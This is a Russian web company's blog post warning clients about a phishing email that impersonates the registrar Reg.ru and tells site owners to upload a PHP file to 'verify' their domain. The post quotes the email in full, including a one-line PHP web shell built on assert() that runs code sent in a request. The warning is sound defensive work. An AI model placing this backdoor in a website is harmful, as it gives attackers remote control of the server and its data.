Екатеринбург:

+7 (343) 219-08-80
Главная / Блог / Получили письмо "Необходимо активировать доменное имя" - знайте, ЭТО МОШЕННИКИ!

Получили письмо "Необходимо активировать доменное имя" - знайте, ЭТО МОШЕННИКИ!

Получили письмо "Необходимо активировать доменное имя" - знайте, ЭТО МОШЕННИКИ!

19 июля | 198 просмотров

Блог

Многие наши клиенты получили на электронную почту письма с уведомление о необходимости активировать доменное имя разместив  на хостинге определенный файл с кодом. Письмо якобы от компании регистратора Reg.ru.

 

Для начала давайте его внимательно изучим:

 

  • Отправлено с электронного адреса noreply@reg.tech, что очень похоже по написанию на адрес компании Reg.ru.;

 

 

  • Так же в письме присутствует логотип Reg.ru;

 

 

  • Само письмо внешне выполнено в точности со стилистическим оформлением писем компании Reg.ru.

 

Все сделано чтобы ввести получателя в заблуждение, чтобы он не сомневался что это официальное руководство к действию, которое необходимо выполнить в кратчайшие сроки.

 

Текст письма:

 

Уважаемый администратор домена!
 
В соответствии с дополнениями, внесенными в регламент ICANN, Вы должны подтвердить, что фактическое управление доменным именем ... (здесь указан ваш домен, прим. автора) осуществляется лицом, указанным в качестве его администратора.
 
Чтобы подтвердить, что Вы имеете возможность управлять доменом, создайте в корневой директории сайта файл a1o606mhv7wpe3xa.php со следующим содержимым:
 
<?php
assert(stripslashes($_REQUEST[REG]));
?>
 
Файл должен быть создан в течение трех рабочих дней с момента получения настоящего письма и находиться на сервере до 9 августа 2017 года, 21:00 (UTC+03:00), в противном случае процедура верификации будет считаться непройденной.
 
Уведомляем Вас о том, что если процедура подтверждения не будет пройдена, делегирование домена будет приостановлено.

Скриншот письма:

 

Необходимо активировать домен
 
Мы связались с компанией Reg.ru чтобы получить комментарии по поводу писем по активации домена, на что получили ответ, что никаких писем они не отсылали, никакой активации выполнить не требовали, и уж тем более не просили разместить сторонние файлы на сайтах. Все это дело рук мошенников, пытающихся получить доступ к содержимому сайта и хостинга. 
 
Текст официального ответа следующий:
 
Обращаем ваше внимание, что компания REG.RU не отправляла данные письма, а также никогда не запрашивает подтверждение прав на домен подобным образом и не требует размещения файлов на хостинге. Мошенники при помощи массовых рассылок электронных писем от имени известных компаний преследуют цель получения доступа к конфиденциальным данным пользователей или распространения вредоносных программ. Поэтому при получении такого письма настоятельно рекомендуем проигнорировать его.
 
Что следует сделать получив такое письмо?
 
Если вы все же сомневаетесь, перешлите письмо компании обслуживающей ваш сайт, чтобы уточнить является ли оно официальным.
Если сомнений что это мошенники нет, то: Письмо отметить как СПАМ, адрес отправителя добавить в черный список. Больше никаких действий предпринимать ненужно.
 
Будьте внимательны! Помните, это лишь один пример, подобных писем с разным содержанием от имени якобы официальных компаний может быть множество.

Свежие публикации данной категории

На сайте site365.ru мы не собираем и не храним никакую информацию без вашего согласия.
Cookie используются для сбора статистики и информации технического характера и хранятся на вашем устройстве.

Принять и закрыть